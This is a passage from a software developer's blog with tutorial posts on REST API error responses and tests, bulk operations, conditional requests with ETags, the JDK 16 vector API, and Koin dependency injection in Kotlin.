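            return new MappedError(404, "ARTICLE_NOT_FOUND", "No article with id " + id + " found");
        }
        // Unexpected server error: details belong in the server log, not in the response
        return new MappedError(500, "INTERNAL_ERROR", "An unexpected error occurred");
    }
}
```

Note that the exception message of an unexpected error never reaches the client in this sketch, which avoids leaking internal information by accident.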

Testing error responses

A good test suite should not miss tests for specific error responses. In our example we can verify error behaviour in different ways. One way is to use a Spring MockMvc test.

For example:


@SpringBootTest
@AutoConfigureMockMvc
public class ArticleExceptionHandlerTest {

    @Autowired
    private MockMvc mvc;

    @MockBean
    private ArticleRepository articleRepository;

    @Test
    public void articleNotFound() throws Exception {
        when(articleRepository.findById(new ArticleId("123"))).thenReturn(Optional.empty());

        mvc.perform(post("/articles/123/publish"))
                .andExpect(status().isNotFound())
                .andExpect(jsonPath("$.code").value("ARTICLE_NOT_FOUND"))
                .andExpect(jsonPath("$.message").value("No article with id 123 found"));
    }
}

Here, we use a mocked ArticleRepository that returns an empty Optional for the passed id. We then verify if the error code and message match the expected strings.

In case you want to learn more about testing Spring applications with MockMvc: I recently wrote an article showing how to improve MockMvc tests.

Summary

Useful error messages are an important part of an API.

If errors are produced by the client (HTTP 4xx status codes), servers should provide a descriptive error response containing at least an error code and a human readable error message. Responses for unexpected server errors (HTTP 5xx) should be conservative to avoid accidental exposure of any internal information.

To provide useful error responses we can use specific exceptions that carry related data. Within @ExceptionHandler methods we then construct error messages based on the exception data.

Supporting bulk operations in REST APIs

2022-08-09T21:51:23Z

Bulk (or batch) operations are used to perform an action on more than one resource in a single request. This can help reduce networking overhead. For network performance it is usually better to make fewer requests instead of more requests with less data.

However, before adding support for bulk operations you should think twice if this feature is really needed. Often network performance is not what limits request throughput. You should also consider techniques like HTTP pipelining as an alternative to improve performance.

When implementing bulk operations we should differentiate between two different cases:

Bulk operations that group together many arbitrary operations in one request. For example: Delete product with id 42, create a user named John and retrieve all product-reviews created yesterday.
Bulk operations that perform one operation on different resources of the same type. For example: Delete the products with id 23, 45, 67 and 89.

In the next section we will explore different solutions that can help us with both situations. Be aware that the shown solutions might not look very REST-like. Bulk operations in general are not very compatible with REST constraints as we operate on different resources with a single request. So there simply is no real REST solution.

In the following examples we will always return a synchronous response. However, as bulk operations usually take longer to process it is likely you are also interested in an asynchronous processing style. In this case, my post about asynchronous operations with REST might also be interesting to you.

Expressing multiple operations within the request body

An approach that quickly comes to mind is to use a standard data format like JSON to define a list of desired operations.

Let's start with a simple example request:


POST /batch


[
    {
        "path": "/products",
        "method": "post",
        "body": {
            "name": "Cool Gadget",
            "price": "$ 12.45 USD"
        }
    }, {
        "path": "/users/43",
        "method": "put",
        "body": {
            "name": "Paul"
        }
    },
    ...
]

We use a generic /batch endpoint that accepts a simple JSON format to describe desired operations using URIs and HTTP methods. Here, we want to execute a POST request to /products and a PUT request to /users/43.

A response body for the shown request might look like this:


[
    {
        "path": "/products",
        "method": "post",
        "body": {
            "id": 123,
            "name": "Cool Gadget",
            "price": "$ 12.45 USD"
        },
        "status": 201
    }, {
        "path": "/users/43",
        "method": "put",
        "body": {
            "id": 43,
            "name": "Paul"
        },
        "status": 200
    },
    ...
]

For each requested operation we get a result object containing the URI and HTTP method again. Additionally we get the status code and response body for each operation.

This does not look too bad. In fact, APIs like this can be found in practice. Facebook, for example, uses a similar approach to batch multiple Graph API requests.

However, there are some things to consider with this approach:

How are the desired operations executed on the server side? Maybe it is implemented as a simple method call. It is also possible to create real HTTP requests from the JSON data and then process those requests. In this case, it is important to think about request headers which might contain important information required by the processing endpoint (e.g. authentication tokens, etc.).

Headers in general are missing in this example. However, headers might be important. For example, it is perfectly viable for a server to respond to a POST request with HTTP 201 and an empty body (see my post about resource creation). The URI of the newly created resource is usually transported using a Location header. Without access to this header the client might not know how to look up the newly created resource. So think about adding support for headers in your request format.

In the example we assume that all requests and responses use JSON data as body, which might not always be the case (think of file uploads for example). As an alternative we can define the request body as a string, which gives us more flexibility. In this case, we need to escape JSON double quotes, which can be awkward to read.

An example request that includes headers and uses a string body might look like this:


[
    {
        "path": "/users/43",
        "method": "put",
        "headers": [{ 
            "name": "Content-Type", 
            "value": "application/json"
        }],
        "body": "{ \"name\": \"Paul\" }"
    },
    ...
]
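On the server side, the "simple method call" variant mentioned above could be sketched roughly like this. This is only a minimal illustration: BatchDispatcher, Operation and Result are hypothetical names, not part of any framework, and JSON parsing is left out. Each operation carries its own headers and each result can return headers (such as Location) to the client.

```java
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
import java.util.Locale;
import java.util.Map;
import java.util.function.Function;

// Hypothetical dispatcher that maps batch entries to plain method calls.
final class BatchDispatcher {

    // One entry of the batch request (method, path, headers and a string body)
    record Operation(String method, String path, Map<String, String> headers, String body) {}

    // One entry of the batch response, including response headers
    record Result(String method, String path, int status, Map<String, String> headers, String body) {}

    private final Map<String, Function<Operation, Result>> handlers = new HashMap<>();

    void register(String method, String path, Function<Operation, Result> handler) {
        handlers.put(key(method, path), handler);
    }

    // Executes all operations in order and collects one result per operation
    List<Result> execute(List<Operation> operations) {
        List<Result> results = new ArrayList<>();
        for (Operation op : operations) {
            Function<Operation, Result> handler = handlers.get(key(op.method(), op.path()));
            if (handler == null) {
                // Assumption: unknown routes are reported as 404 for this entry only
                results.add(new Result(op.method(), op.path(), 404, Map.of(), ""));
            } else {
                results.add(handler.apply(op));
            }
        }
        return results;
    }

    // The example request uses lower case method names, so we normalise them here
    private static String key(String method, String path) {
        return method.toUpperCase(Locale.ROOT) + " " + path;
    }
}
```

A handler registered for POST /products can then return status 201 together with a Location header, so the client still learns the URI of the created resource even if the body is empty.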

Multipart Content-Type to the rescue?

In the previous section we essentially translated HTTP requests and responses to JSON so we can group them together in a single request. However, we can do the same in a more standardized way with multipart content-types.

A multipart Content-Type header indicates that the HTTP message body consists of multiple distinct body parts and each part can have its own Content-Type. We can use this to merge multiple HTTP requests into a single multipart request body.

A quick note before we look at an example: My example snippets for HTTP requests and responses are usually simplified (unnecessary headers, HTTP versions, etc. might be skipped). However, in the next snippet we pack HTTP requests into the body of a multipart request requiring correct HTTP syntax. Therefore, the next snippets use the exact HTTP message syntax.

Now let's look at an example multipart request containing two HTTP requests:


 1  POST http://api.my-cool-service.com/batch HTTP/1.1
 2  Content-Type: multipart/mixed; boundary=request_delimiter
 3  Content-Length: <total body length in bytes>
 4
 5  --request_delimiter
 6  Content-Type: application/http
 7  Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7
 8
 9  POST http://api.my-cool-service.com/products HTTP/1.1
10  Content-Type: application/json
11
12  {
13      "name": "Cool Gadget",
14      "price": "$ 12.45 USD"
15  }
16  --request_delimiter
17  Content-Type: application/http
18  Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99
19
20  PUT http://api.my-cool-service.com/users/43 HTTP/1.1
21  Content-Type: application/json
22
23  {
24      "name": "Paul"
25  }
26  --request_delimiter--

Multipart content types require a boundary parameter. This parameter specifies the so-called encapsulation boundary which acts like a delimiter between different body parts.

Quoting the RFC:

The encapsulation boundary is defined as a line consisting entirely of two hyphen characters ("-", decimal code 45) followed by the boundary parameter value from the Content-Type header field.

In line 2 we set the Content-Type to multipart/mixed with a boundary parameter of request_delimiter. The blank line after the Content-Length header separates HTTP headers from the body. The following lines define the multipart request body.

We start with the encapsulation boundary indicating the beginning of the first body part. Next follow the body part headers. Here, we set the Content-Type header of the body part to application/http which indicates that this body part contains an HTTP message. We also set a Content-ID header which can be used to identify a specific body part. We use a client generated UUID for this.

The next blank line (line 8) indicates that now the actual body part begins (in our case that's the embedded HTTP request). The first body part ends with the encapsulation boundary at line 16.

The encapsulation boundary is followed by the next body part, which uses the same format as the first one.

Note that the encapsulation boundary following the last body part contains two additional hyphens at the end which indicates that no further body parts will follow.
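To make the structure of such a body more tangible, here is a small sketch that assembles a multipart/mixed body from already serialized HTTP requests. MultipartBatchBuilder is a hypothetical helper, and we assume the embedded requests are passed in as complete raw text messages. Lines are separated with CRLF as required for MIME messages.

```java
import java.util.List;
import java.util.UUID;

// Hypothetical helper that builds a multipart/mixed request body.
final class MultipartBatchBuilder {

    private static final String CRLF = "\r\n";

    // rawRequests: complete HTTP requests in text form (assumption of this sketch)
    static String build(String boundary, List<String> rawRequests) {
        StringBuilder body = new StringBuilder();
        for (String rawRequest : rawRequests) {
            // Encapsulation boundary: two hyphens followed by the boundary value
            body.append("--").append(boundary).append(CRLF);
            // Body part headers
            body.append("Content-Type: application/http").append(CRLF);
            body.append("Content-ID: ").append(UUID.randomUUID()).append(CRLF);
            // Blank line separates body part headers from the embedded request
            body.append(CRLF);
            body.append(rawRequest).append(CRLF);
        }
        // The closing boundary carries two additional hyphens at the end
        body.append("--").append(boundary).append("--").append(CRLF);
        return body.toString();
    }
}
```

The boundary value passed to build(..) has to match the boundary parameter of the outer Content-Type header and must not occur inside any of the embedded requests.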

A response to this request might follow the same principle and look like this:


HTTP/1.1 200 OK
Content-Type: multipart/mixed; boundary=response_delimiter
Content-Length: <total body length in bytes>

--response_delimiter
Content-Type: application/http
Content-ID: fa32d92f-87d9-4097-9aa3-e4aa7527c8a7

HTTP/1.1 201 Created
Content-Type: application/json
Location: http://api.my-cool-service.com/products/123

{
    "id": 123,
    "name": "Cool Gadget",
    "price": "$ 12.45 USD"
}
--response_delimiter
Content-Type: application/http
Content-ID: a0e98ffb-0b62-42a1-a321-54c6e9ef4c99

HTTP/1.1 200 OK
Content-Type: application/json

{
    "id": 43,
    "name": "Paul"
}
--response_delimiter--

This multipart response body contains two body parts, both containing HTTP responses. Note that the first body part also contains a Location header which should be included when sending an HTTP 201 (Created) response status.

Multipart messages seem like a nice way to merge multiple HTTP messages into a single message as they use a standardized and generally understood technique.

However, there is one big caveat here. Clients and the server need to be able to construct and process the actual HTTP messages in raw text format. Usually this functionality is hidden behind HTTP client libraries and server side frameworks and might not be easily accessible.

Bulk operations on REST resources

In the previous examples we used a generic /batch endpoint that can be used to modify many different types of resources in a single request. Now we will apply bulk operations to a specific set of resources to move a bit closer to a REST-like style.

Sometimes only a single operation needs to support bulk data. In such a case, we can simply create a new resource that accepts a collection of bulk entries.

For example, assume we want to import a couple of products with a single request:


POST /product-import


[
    {
        "name": "Cool Gadget",
        "price": "$ 12.45 USD"
    },
    {
        "name": "Very cool Gadget",
        "price": "$ 19.99 USD"
    },
    ...
]

A simple response body might look like this:


[
    {
        "status": "imported",
        "id": 234235
    },
    {
        "status": "failed",
        "error": "Product name too long, max 15 characters allowed"
    },
    ...
]

Again we return a collection containing details about every entry. As we provide a response to a specific operation (importing products) there is no need to use a generic response format. Instead, we can use a specific format that communicates the import status and potential import errors.
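A server side implementation of such an import could be sketched like this. ProductImport, Product and ImportResult are hypothetical names used for illustration only, the id counter stands in for a database generated id and the length limit is taken from the example error message above.

```java
import java.util.ArrayList;
import java.util.List;

// Hypothetical import service; not part of any framework.
final class ProductImport {

    record Product(String name, String price) {}

    // id is null for failed entries, error is null for imported entries
    record ImportResult(String status, Long id, String error) {}

    private static final int MAX_NAME_LENGTH = 15;

    private long nextId = 1; // stand-in for a database generated id

    // Processes every entry on its own and returns one result per entry
    List<ImportResult> importAll(List<Product> products) {
        List<ImportResult> results = new ArrayList<>();
        for (Product product : products) {
            if (product.name().length() > MAX_NAME_LENGTH) {
                results.add(new ImportResult("failed", null,
                        "Product name too long, max " + MAX_NAME_LENGTH + " characters allowed"));
            } else {
                results.add(new ImportResult("imported", nextId++, null));
            }
        }
        return results;
    }
}
```

A failing entry does not stop the import here. The remaining entries are still processed and the client can find out per entry what happened.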

Partially updating collections

In a previous post we learned that PATCH can be used for partial modification of resources. PATCH can also use a separate format to describe the desired changes.

Both sound useful for implementing bulk operations. By using PATCH on a resource collection (e.g. /products) we can partially modify the collection. We can use this to add new elements to the collection or update existing elements.

For example we can use the following snippet to modify the /products collection:


PATCH /products


[
    {
        "action": "replace",
        "path": "/123",
        "value": {
            "name": "Yellow cap",
            "description": "It's a cap and it's yellow"
        }        
    },
    {
        "action": "delete",
        "path": "/124"
    },
    {
        "action": "create",
        "value": {
            "name": "Cool new product",
            "description": "It is very cool!"
        }
    }
]

Here we perform three operations on the /products collection in a single request. We update resource /products/123 with new information, delete resource /products/124 and create a completely new product.

A response might look something like this:


[
    {
        "action": "replace",
        "path": "/123",
        "status": "success"
    }, 
    {
        "action": "delete",
        "path": "/124",
        "status": "success"
    }, {
        "action": "create",
        "status": "success"
    }
]

Here we need to use a generic response entry format again as it needs to be compatible with all possible request actions.

However, it would be too easy without a huge caveat: PATCH requires changes to be applied atomically.

The RFC says:

The server MUST apply the entire set of changes atomically and never provide [..] a partially modified representation. If the entire patch document cannot be successfully applied, then the server MUST NOT apply any of the changes.

I usually would not recommend implementing bulk operations in an atomic way as this can increase complexity a lot.

A simple workaround to be compatible with the HTTP specifications is to create a separate sub-resource and use POST instead of PATCH.

For example:


POST /products/batch

(same request body as the previous PATCH request)

If you really want to go the atomic way, you might need to think about the response format again. In this case, it is not possible that some requested changes are applied while others are not. Instead, you need to communicate which requested changes failed and which could have been applied if everything else had worked.

In this case, a response might look like this:


[
    {
        "action": "replace",
        "path": "/123",
        "status": "rolled back"
    }, 
    {
        "action": "delete",
        "path": "/124",
        "status": "failed",
        "error": "resource not found"
    },
    ..
]
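The status values of such an atomic response could be derived roughly as shown in the next sketch. AtomicBatch and its records are hypothetical names, and the set of existing paths is just a stand-in for a real lookup in the data store. The sketch only computes the result entries. Actually applying the changes (for example within a database transaction) is left out.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Set;

// Hypothetical helper that computes the per-entry status of an atomic batch.
final class AtomicBatch {

    record Operation(String action, String path) {}

    record Result(String action, String path, String status, String error) {}

    // existingPaths: stand-in for a lookup against the real data store
    static List<Result> evaluate(List<Operation> operations, Set<String> existingPaths) {
        // If a single operation fails, none of the changes may be applied
        boolean anyFailed = operations.stream()
                .anyMatch(op -> !existingPaths.contains(op.path()));

        List<Result> results = new ArrayList<>();
        for (Operation op : operations) {
            if (!existingPaths.contains(op.path())) {
                results.add(new Result(op.action(), op.path(), "failed", "resource not found"));
            } else {
                // Valid on its own, but only applied if everything else is valid too
                String status = anyFailed ? "rolled back" : "success";
                results.add(new Result(op.action(), op.path(), status, null));
            }
        }
        return results;
    }
}
```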

Which HTTP status code is appropriate for responses to bulk requests?

With bulk requests we have the problem that some parts of the request might execute successfully while others fail. If everything worked, it is easy: we can simply return HTTP 200 OK.

Even if all requested changes fail it can be argued that HTTP 200 is still a valid response code as long as the bulk operation itself completed successfully.

Either way, the client needs to process the response body to get detailed information about the processing status.

Another idea that might come to mind is HTTP 207 (Multi-Status). HTTP 207 is part of RFC 4918 (HTTP extensions for WebDAV) and described like this:

A Multi-Status response conveys information about multiple resources in situations where multiple status codes might be appropriate. [..] Although '207' is used as the overall response status code, the recipient needs to consult the contents of the multistatus response body for further information about the success or failure of the method execution. The response MAY be used in success, partial success and also in failure situations.

So far this reads like a great fit.

Unfortunately, HTTP 207 is part of the WebDAV specification and requires a specific response body format that looks like this:


<?xml version="1.0" encoding="utf-8" ?>
<d:multistatus xmlns:d="DAV:">
    <d:response>
        <d:href>http://www.example.com/container/resource3</d:href>
        <d:status>HTTP/1.1 423 Locked</d:status>
        <d:error><d:lock-token-submitted/></d:error>
    </d:response>
</d:multistatus>

This is likely not the response format you want. Some might argue that it is fine to reuse HTTP 207 with a custom response format. Personally I would not recommend doing this and instead use a simple HTTP 200 status code.

In case the bulk request is processed asynchronously, HTTP 202 (Accepted) is the status code to use.

Summary

We looked at different approaches to building bulk APIs. All approaches have their own up- and downsides. There is no single correct way as it always depends on your requirements.

If you need a generic way to submit multiple actions in a single request you can use a custom JSON format. Alternatively you can use a multipart content-type to merge multiple requests into a single request.

You can also come up with separate resources that express the desired operation. This is usually the simplest and most pragmatic way if you only have one or a few operations that need to support bulk operations.

In all scenarios you should evaluate if bulk operations really produce the desired performance gains. Otherwise, the additional complexity of bulk operations is usually not worth the effort.

Interested in more REST related articles? Have a look at my REST API design page.

Looking into the JDK 16 vector API

2021-04-06T18:09:09Z

JDK 16 comes with the incubator module jdk.incubator.vector (JEP 338) which provides a portable API for expressing vector computations. In this post we will have a quick look at this new API.

Note that the API is in incubator status and likely to change in future releases.

Why vector operations?

When supported by the underlying hardware, vector operations can increase the number of computations performed in a single CPU cycle.

Assume we want to add two vectors each containing a sequence of four integer values. Vector hardware allows us to perform this operation (four integer additions in total) in a single CPU cycle. Ordinary additions would only perform one integer addition in the same time.

The new vector API allows us to define vector operations in a platform agnostic way. These operations then compile to vector hardware instructions at runtime.

Note that HotSpot already supports auto-vectorization which can transform scalar operations into vector hardware instructions. However, this approach is quite limited and utilizes only a small set of available vector hardware instructions.

A few example domains that might benefit from the new vector API are machine learning, linear algebra or cryptography.

Enabling the vector incubator module (jdk.incubator.vector)

To use the new vector API we need to use JDK 16 (or newer). We also need to add the jdk.incubator.vector module to our project. This can be done with a module-info.java file:


module com.mscharhag.vectorapi {
    requires jdk.incubator.vector;
}

Implementing a simple vector operation

Let's start with a simple example:


float[] a = new float[] {1f, 2f, 3f, 4f};
float[] b = new float[] {5f, 8f, 10f, 12f};

FloatVector first = FloatVector.fromArray(FloatVector.SPECIES_128, a, 0);
FloatVector second = FloatVector.fromArray(FloatVector.SPECIES_128, b, 0);

FloatVector result = first
        .add(second)
        .pow(2)
        .neg();

We start with two float arrays (a and b) each containing four elements. These provide the input data for our vectors.

Next we create two FloatVectors using the static fromArray(..) factory method. The first parameter defines the size of the vector in bits (here 128). Using the last parameter we are able to define an offset value for the passed arrays (here we use 0).

In Java a float value has a size of four bytes (= 32 bits). So, four float values match exactly the size of our vector (128 bits).

After that, we can define our vector operations. In this example we add both vectors together, then we square and negate the result.

The resulting vector contains the values:


[-36.0, -100.0, -169.0, -256.0]

We can write the resulting vector into an array using the intoArray(..) method:


float[] resultArray = new float[4];
result.intoArray(resultArray, 0);

In this example we use FloatVector to define operations on float values. Of course we can use other numeric types too. Vector classes are available for byte, short, int, long, float and double (ByteVector, ShortVector, etc.).

Working with loops

While the previous example was simple to understand, it does not show a typical use case of the new vector API. To gain any benefits from vector operations we usually need to process larger amounts of data.

In the following example we start with three arrays a, b and c, each having 10000 elements. We want to add the values of a and b and store the result in c: c[i] = a[i] + b[i].

Our code looks like this:


final VectorSpecies<Float> SPECIES = FloatVector.SPECIES_128;

float[] a = randomFloatArray(10_000);
float[] b = randomFloatArray(10_000);
float[] c = new float[10_000];

for (int i = 0; i < a.length; i += SPECIES.length()) {
    VectorMask<Float> mask = SPECIES.indexInRange(i, a.length);
    FloatVector first = FloatVector.fromArray(SPECIES, a, i, mask);
    FloatVector second = FloatVector.fromArray(SPECIES, b, i, mask);
    first.add(second).intoArray(c, i, mask);
}

Here we iterate over the input arrays in strides of vector length. A VectorMask helps us if vectors cannot be completely filled from input data (e.g. during the last loop iteration).
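To illustrate what the mask does in the last iteration, here is a plain Java model of the same loop that does not use the vector API at all. LaneMaskModel is a hypothetical class written for this explanation only. It mimics the idea behind indexInRange(..): a lane is active if its array index is still below the array length.

```java
// Scalar model of the masked loop above. It does not use jdk.incubator.vector.
final class LaneMaskModel {

    // Lane n is active if offset + n is still a valid array index
    static boolean[] indexInRange(int offset, int length, int lanes) {
        boolean[] mask = new boolean[lanes];
        for (int lane = 0; lane < lanes; lane++) {
            mask[lane] = offset + lane < length;
        }
        return mask;
    }

    // Computes c[i] = a[i] + b[i] in strides of 'lanes' elements
    static float[] add(float[] a, float[] b, int lanes) {
        float[] c = new float[a.length];
        for (int i = 0; i < a.length; i += lanes) {
            boolean[] mask = indexInRange(i, a.length, lanes);
            for (int lane = 0; lane < lanes; lane++) {
                // Inactive lanes are skipped, so we never read or write out of bounds
                if (mask[lane]) {
                    c[i + lane] = a[i + lane] + b[i + lane];
                }
            }
        }
        return c;
    }
}
```

With 10000 elements and four lanes every stride is completely filled, so the mask only becomes relevant if the array length is not a multiple of the vector length. For an array with six elements the second stride has only two active lanes.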

Summary

We can use the new vector API to define vector operations for optimizing computations for vector hardware. This way we can increase the number of computations performed in a single CPU cycle. The central elements of the vector API are type specific vector classes like FloatVector or LongVector.

You can find the example source code on GitHub.

Kotlin dependency injection with Koin

2021-03-08T08:29:19Z

Dependency injection is a common technique in today's software design. With dependency injection we pass dependencies to a component instead of creating them inside the component. This way we can separate construction and use of dependencies.

In this post we will look at Koin, a lightweight Kotlin dependency injection library. Koin describes itself as a DSL, a light container and a pragmatic API.

Getting started with Koin

We start with adding the Koin dependency to our project:


<dependency>
    <groupId>org.koin</groupId>
    <artifactId>koin-core</artifactId>
    <version>2.2.2</version>
</dependency>

Koin artifacts are available on jcenter.bintray.com. If not already available you can add this repository with:


<repositories>
    <repository>
        <id>central</id>
        <name>bintray</name>
        <url>https://jcenter.bintray.com</url>
    </repository>
</repositories>

Or if you are using Gradle:


repositories {
    jcenter()    
}

dependencies {
    implementation "org.koin:koin-core:2.2.2"
}

Now let's create a simple UserService class with a dependency to an AddressValidator object:


class UserService(
    private val addressValidator: AddressValidator
) {
    fun createUser(username: String, address: Address) {
        // use addressValidator to validate address before creating user
    }
}

AddressValidator simply looks like this:


class AddressValidator {
    fun validate(address: Address): Boolean {
        // validate address
    }
}

Next we will use Koin to wire both components together. We do this by creating a Koin module:


val myModule = module {
    single { AddressValidator() }
    single(createdAtStart = true) { UserService(get()) }
}

This creates a module with two singletons (defined by the single function). single accepts a lambda expression as parameter that is used to create the component. Here, we simply call the constructors of our previously defined classes.

With get() we can resolve dependencies from a Koin module. In this example we use get() to obtain the previously defined AddressValidator instance and pass it to the UserService constructor.

The createdAtStart option tells Koin to create this instance (and its dependencies) when the Koin application is started.

We start a Koin application with:


val app = startKoin {
    modules(myModule)
}

startKoin launches the Koin container which loads and initializes dependencies. One or more Koin modules can be passed to the startKoin function. A KoinApplication object is returned.

Retrieving objects from the Koin container

Sometimes it is necessary to retrieve objects from the Koin dependency container. This can be done by using the KoinApplication object returned by the startKoin function:


// retrieve UserService instance from previously defined module
val userService = app.koin.get<UserService>()

Another approach is to use the KoinComponent interface. KoinComponent provides an inject method we use to retrieve objects from the Koin container. For example:


class MyApp : KoinComponent {
   
    private val userService by inject<UserService>()

    ...
}

Factories

Sometimes object creation is not as simple as just calling a constructor. In this case, a factory method can come in handy. Koin's usage of lambda expressions for object creation supports us here. We can simply call factory functions from the lambda expression.

For example, assume the creation of a UserService instance is more complex. We can come up with something like this:


val myModule = module {

    fun provideUserService(addressValidator: AddressValidator): UserService {
        val userService = UserService(addressValidator)
        // more code to configure userService
        return userService
    }

    single { AddressValidator() }
    single { provideUserService(get()) }
}

As mentioned earlier, single is used to create singletons. This means Koin creates only one object instance that is then shared by other objects.

However, sometimes we need a new object instance for every dependency. In this case, the factory function helps us:


val myModule = module {
    factory { AddressValidator() }
    single { UserService(get()) }
    single { OtherService(get()) } // OtherService constructor takes an AddressValidator instance
}

With factory, Koin creates a new AddressValidator object whenever an AddressValidator is needed. Here, UserService and OtherService get two different AddressValidator instances via get().

Providing interface implementations

Let's assume AddressValidator is an interface that is implemented by AddressValidatorImpl. We can still write our Koin module like this:


val myModule = module {
    single { AddressValidatorImpl() }
    single { UserService(get()) }
}

This defines an AddressValidatorImpl instance that can be injected into other components. However, it is likely that AddressValidatorImpl should only expose the AddressValidator interface. This way we can enforce that other components only depend on AddressValidator and not on a specific interface implementation. We can accomplish this by adding a generic type to the single function:


val myModule = module {
    single<AddressValidator> { AddressValidatorImpl() }
    single { UserService(get()) }
}

This way we expose only the AddressValidator interface while creating an AddressValidatorImpl instance.

Properties and configuration

Obtaining properties from a configuration file is a common task. Koin supports loading property files and gives us the option to inject properties.

First we need to tell Koin to load properties which is done by using the fileProperties function. fileProperties has an optional fileName argument we can use to specify a path to a property file. If no argument is given Koin tries to load koin.properties from the classpath.

For example:


val app = startKoin {
   
    // loads properties from koin.properties
    fileProperties()
    
    // loads properties from custom property file
    fileProperties("/other.properties")
    
    modules(myModule)
}

Assume we have a component that requires some configuration property:


class ConfigurableComponent(val someProperty: String)

.. and a koin.properties file with a single entry:


foo.bar=baz

We can now retrieve this property and inject it to ConfigurableComponent by using the getProperty function:


val myModule = module {
    single { ConfigurableComponent(getProperty("foo.bar")) }
}

Summary

Koin is an easy to use dependency injection container for Kotlin. Koin provides a simple DSL to define components and injection rules. We use this DSL to create Koin modules which are then used to initialize the dependency injection container. Koin is also able to inject properties loaded from files.

For more information you should visit the Koin documentation page. You can find the sources for this post on GitHub.

REST API Design: Dealing with concurrent updates

2021-06-13T18:09:49Z

Concurrency control can be an important part of a REST API, especially if you expect concurrent update requests for the same resource. In this post we will look at different options to avoid lost updates over HTTP.

Let's start with an example request flow, to understand the problem:

We start with Alice and Bob requesting the resource /articles/123 from the server which responds with the current resource state. Then, Bob executes an update request based on the previously received data. Shortly after that, Alice also executes an update request. Alice's request is also based on the previously received resource and does not include the changes made by Bob. After the server has finished processing Alice's update, Bob's changes have been lost.

HTTP provides a solution for this problem: Conditional requests, defined in RFC 7232.

Conditional requests use validators and preconditions defined in specific headers. Validators are metadata generated by the server that can be used to define preconditions. For example, last modification dates or ETags are validators that can be used for preconditions. Based on those preconditions the server can decide if an update request should be executed.

For state changing requests the If-Unmodified-Since and If-Match headers are particularly interesting. We will learn how to avoid concurrent updates using those headers in the next sections.

Using a last modification date with an If-Unmodified-Since header

Probably the easiest way to avoid lost updates is the use of a last modification date. Saving the date of last modification for a resource is often a good idea so it is likely we already have this value in our database. If this is not the case, it is often very easy to add.

When returning a response to the client we can now add the last modification date in the Last-Modified response header. The Last-Modified header uses the following format:


<day-name>, <day> <month-name> <year> <hour>:<minute>:<second> GMT

For example:

Request:


GET /articles/123

Response:


HTTP/1.1 200 OK
Last-Modified: Sat, 13 Feb 2021 12:34:56 GMT

{
    "title": "Sunny summer",
    "text": "bla bla ..."
}

To update this resource the client now has to add the If-Unmodified-Since header to the request. The value of this header is set to the last modification date retrieved from the previous GET request.

Example update request:


PUT /articles/123
If-Unmodified-Since: Sat, 13 Feb 2021 12:34:56 GMT

{
    "title": "Sunny winter",
    "text": "bla bla ..."
}

Before executing the update, the server has to compare the last modification date of the resource with the value from the If-Unmodified-Since header. The update is only executed if both values are identical.

One might argue that it is enough to check if the last modification date of the resource is newer than the value of the If-Unmodified-Since header. However, this gives clients the option to overrule other concurrent requests by sending a modified last modification date (e.g. a future date).

A problem with this approach is that the precision of the Last-Modified header is limited to seconds. If multiple concurrent update requests are executed in the same second, we can still run into the lost update problem.
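The comparison on the server side could be sketched like this. UnmodifiedSinceCheck is a hypothetical helper and we assume the last modification date is stored as an Instant. Because the header only has second precision, the stored value is truncated to seconds before both values are compared.

```java
import java.time.Instant;
import java.time.ZonedDateTime;
import java.time.format.DateTimeFormatter;
import java.time.temporal.ChronoUnit;

// Hypothetical helper that evaluates an If-Unmodified-Since precondition.
final class UnmodifiedSinceCheck {

    // Returns true if the update may be executed
    static boolean matches(Instant lastModified, String ifUnmodifiedSince) {
        // Parses header values like "Sat, 13 Feb 2021 12:34:56 GMT"
        Instant headerValue = ZonedDateTime
                .parse(ifUnmodifiedSince, DateTimeFormatter.RFC_1123_DATE_TIME)
                .toInstant();
        // The header carries no sub-second information, so we drop it before comparing
        return lastModified.truncatedTo(ChronoUnit.SECONDS).equals(headerValue);
    }
}
```

The truncation also shows the limitation described above: two updates stored at 12:34:56.100 and 12:34:56.900 both match the header value 12:34:56, so a lost update within the same second is not detected.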

Using an ETag with an If-Match header

Another approach is the use of an entity tag (ETag). ETags are opaque strings generated by the server for the requested resource representation. For example, the hash of the resource representation can be used as ETag.

ETags are sent to the client using the ETag header. For example:

Request:


GET /articles/123

Response:


HTTP/1.1 200 OK
ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "title": "Sunny summer",
    "text": "bla bla ..."
}

When updating the resource, the client sends the ETag in an If-Match header back to the server:


PUT /articles/123
If-Match: "a915ecb02a9136f8cfc0c2c5b2129c4b"

{
    "title": "Sunny winter",
    "text": "bla bla ..."
}

The server now verifies that the ETag matches the current representation of the resource. If the ETag does not match, the resource state on the server has been changed between GET and PUT requests.

Strong and weak validation

RFC 7232 differentiates between weak and strong validation:

Weak validators are easy to generate but are far less useful for comparisons. Strong validators are ideal for comparisons but can be very difficult (and occasionally impossible) to generate efficiently.

Strong validators change whenever a resource representation changes. In contrast weak validators do not change every time the resource representation changes.

ETags can be generated in weak and strong variants. Weak ETags must be prefixed by W/.

Here are a few example ETags:

Weak ETags:


ETag: W/"abcd"
ETag: W/"123"

Strong ETags:


ETag: "a915ecb02a9136f8cfc0c2c5b2129c4b"
ETag: "ngl7Kfe73Mta"

Note that the ETag must be placed within double quotes, so the shown quotes are not optional.

Besides concurrency control, preconditions are often used for caching and bandwidth reduction. In these situations weak validators can be good enough. For concurrency control in REST APIs strong validators are usually preferable.

Note that using Last-Modified and If-Unmodified-Since headers is considered weak validation because of the limited precision. We cannot be sure that the server state has not been changed by another request in the same second. However, whether this is an actual problem depends on the number of concurrent update requests you expect.

Computing ETags

Strong ETags have to be unique for all versions of all representations for a particular resource. For example, JSON and XML representations of the same resource should have different ETags.

Generating and validating strong ETags can be a bit tricky. For example, assume we generate an ETag by hashing a JSON representation of a resource before sending it to the client. To validate the ETag for an update request we now have to load the resource, convert it to JSON and then hash the JSON representation.

In the best case resources contain an implementation-specific field that tracks changes. This can be a precise last modification date or some form of internal revision number. For example, when using database frameworks like Java Persistence API (JPA) with optimistic locking we might already have a version field that increases with every change.

We can then compute an ETag by hashing the resource id, the media-type (e.g. application/json) together with the last modification date or the revision number.
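A minimal sketch of this idea in Java might look like the following. The class name ETagGenerator, the use of SHA-256 and the | separator are assumptions made for this example. Any stable hash function should work as long as all three values are part of the input.

```java
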